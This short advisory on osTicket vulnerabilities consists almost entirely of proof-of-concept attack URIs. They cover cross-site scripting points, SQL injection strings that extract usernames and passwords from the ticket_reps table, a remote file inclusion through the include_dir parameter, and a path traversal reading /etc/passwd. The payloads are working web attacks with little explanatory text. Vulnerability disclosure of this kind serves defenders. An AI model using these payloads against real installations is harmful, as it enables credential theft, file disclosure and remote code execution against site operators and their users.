OSTicket Multiple Input Validation and Remote Code Injection Vulnerabilities

OSTicket Multiple Input Validation and Remote Code Injection Vulnerabilities

No exploits are required.

The following proof of concept URI's demonstrating the vulnerabilities are available:
http://www.example.com/view.php?e=test@test.com&t=480826[XSS]
http://www.example.com/include/header.php?osticket_title=%3C/title%3E[XSS]
http://www.example.com/include/admin_login.php?em=asdf[XSS]
http://www.example.com/include/user_login.php?e=asdf[XSS]
http://www.example.com/include/open_submit.php?err=[XSS]

http://www.example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*
http://www.example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*
http://www.example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=&sort=ID&way=ASC&per=5&search_submit=Search

http://www.example.com/include/main.php?config[search_disp]=true&include_dir=http://www.example.com

http://www.example.com/attachments.php?file=../../../../../../.. /etc/passwd